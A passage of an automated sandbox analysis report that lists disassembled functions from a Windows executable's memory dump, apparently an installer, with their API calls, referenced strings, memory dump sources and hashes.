                                                            • GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
                                                            • ReleaseDC.USER32 ref: 005CE2F2
                                                            Strings
                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CE2AA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                            • API String ID: 1334710084-222967699
                                                            • Opcode ID: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                            • Instruction ID: 68d2e7468c57547273e36bf030651d7f5f3d68c5ac32077f2b8cb66f1dd3ef54
                                                            • Opcode Fuzzy Hash: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                            • Instruction Fuzzy Hash: 8E01847AA14204BFE704DEE9CC42F9EB7ECEB49704F510469F604E7280D678AD008724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B8141, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0060F6D8: GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                              • Part of subcall function 0060F6D8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                            • SetForegroundWindow.USER32(?), ref: 006B817A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Process$CurrentForegroundOpenTokenWindow
                                                            • String ID: %hm$(\m$Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.$bm
                                                            • API String ID: 3179053593-36556386
                                                            • Opcode ID: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                            • Instruction ID: d1bb377931262cf507ba46983c8bd46f5a1d5c2f393bef5d4bb5aec732555b7a
                                                            • Opcode Fuzzy Hash: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                            • Instruction Fuzzy Hash: 621130746042049FD700EB69DD86FE837EAAB49304F5540BAF401AB7A2CE79AC82C759
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409E60, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                            • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                            • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 3320372497-2970929446
                                                            • Opcode ID: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                            • Instruction ID: a01582976990e38fcf300ac2ca1e4f1bd102d55210953f65d1fcb3aa769fb624
                                                            • Opcode Fuzzy Hash: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                            • Instruction Fuzzy Hash: 52F04FA0A44780BAEB10B7A19C07F7B261AD741B28F10567FB214B91D3C6B85CC49AE9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0043171C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317D1
                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317ED
                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00431826
                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004318A3
                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318BC
                                                            • VariantCopy.OLEAUT32(?,?), ref: 004318F7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                            • String ID:
                                                            • API String ID: 351091851-0
                                                            • Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                            • Instruction ID: ede279f2d9249a03c5eeb803d5e3445196a0ad83b08d93498a0369a0c14e8414
                                                            • Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                            • Instruction Fuzzy Hash: 41512D75A002299FCB62DB59CD81BD9B3FCAF0C304F4455EAE508E7212D634AF858F58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AE6F8, Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006AE714
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B78BD,00000000,006B81F9), ref: 006AE743
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006AE758
                                                            • SetWindowLongW.USER32 ref: 006AE77F
                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AE798
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AE7B9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$Long$Show
                                                            • String ID:
                                                            • API String ID: 3609083571-0
                                                            • Opcode ID: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
                                                            • Instruction ID: c5f2d3f14be40374ea6ae40072baf741f42d7864aa45c80e1917733d0618a2ec
                                                            • Opcode Fuzzy Hash: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
                                                            • Instruction Fuzzy Hash: FC111C75745200AFD700EB68DD81FE237EAAB9E314F4541A5F6158F3E2CA65EC40DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405A04, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
                                                            • Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
                                                            • Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
                                                            • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                            • Instruction ID: 7a051e160dd760b70f5de690832b1da94a718f6c47d0b95a7d4eebd5f387ad29
                                                            • Opcode Fuzzy Hash: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                            • Instruction Fuzzy Hash: BCC1F272601B118BDB15CF69E884B27BBA2EB85310F18827FD4599F3D5C7B4A841CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060D3B4, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle
                                                            • String ID: .tmp$Gtk$_iu
                                                            • API String ID: 3498533004-1320520068
                                                            • Opcode ID: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                            • Instruction ID: 38fd5bd3aef28e796ac18a57f9f91bd27b67d48edde35eb58a18837c564f9665
                                                            • Opcode Fuzzy Hash: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                            • Instruction Fuzzy Hash: 73319030E80209ABDB14EBE4C842BDEBBB5AF54308F118169E904B73D1D738AE458B55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B8998, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • ShowWindow.USER32(?,00000005,00000000,006B8C4E,?,?,00000000), ref: 006B89DE
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                              • Part of subcall function 00424020: SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B
                                                              • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                            • API String ID: 3312786188-1660910688
                                                            • Opcode ID: 87cec6a378dec6b032675d7c559790f2158faaa0e8ad7578a241a316ddb9e1cc
                                                            • Instruction ID: 43941ce92546cf1f75effb4615d96ab71b8b1f254b2d248514a95b56d5af6042
                                                            • Opcode Fuzzy Hash: 87cec6a378dec6b032675d7c559790f2158faaa0e8ad7578a241a316ddb9e1cc
                                                            • Instruction Fuzzy Hash: 65415CB0A002059FC700EFA4CD96E9EBBB6FB88304F51846AF400A7751DB75AE41DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006153AC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 006153C6
                                                            • SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00615463
                                                            Strings
                                                            • Failed to create DebugClientWnd, xrefs: 0061542C
                                                            • hSa, xrefs: 00615415
                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 006153F2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$hSa
                                                            • API String ID: 3850602802-2905362044
                                                            • Opcode ID: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
                                                            • Instruction ID: bd2b79d17f40968884fe1c372ced24de8c60c917dea0cb25488337d16b2a65e4
                                                            • Opcode Fuzzy Hash: 4e2498dae47c6d0870a5ab4103f59c6443b436741fa29bda88c5ce5a22a9ee1a
                                                            • Instruction Fuzzy Hash: 391123B1A403129FE300EB28DC81FDABBD69F94304F08002AF5858B3D2D3749C84C766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00624AA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MsgWaitForMultipleObjects.USER32 ref: 00624AD6
                                                            • GetExitCodeProcess.KERNEL32 ref: 00624AF9
                                                            • CloseHandle.KERNEL32(?,00624B2C,00000001,00000000,000000FF,000004FF,00000000,00624B25), ref: 00624B1F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                            • API String ID: 2573145106-3235461205
                                                            • Opcode ID: 361a62daa0bf1d295b617bedeb0d636d14927d9149230c5f986aec38bd004ab5
                                                            • Instruction ID: b445045a4a45572890d55b61ba1fda7f57045845c9b5a3357f52015174d7dfc9
                                                            • Opcode Fuzzy Hash: 361a62daa0bf1d295b617bedeb0d636d14927d9149230c5f986aec38bd004ab5
                                                            • Instruction Fuzzy Hash: CE01A234640605AFD710EFA8ED62E9977EAEB49721F200265F520D73D0DE74ED44CA19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004070B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID: :
                                                            • API String ID: 1611563598-336475711
                                                            • Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                            • Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
                                                            • Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                            • Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0059BDE0, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
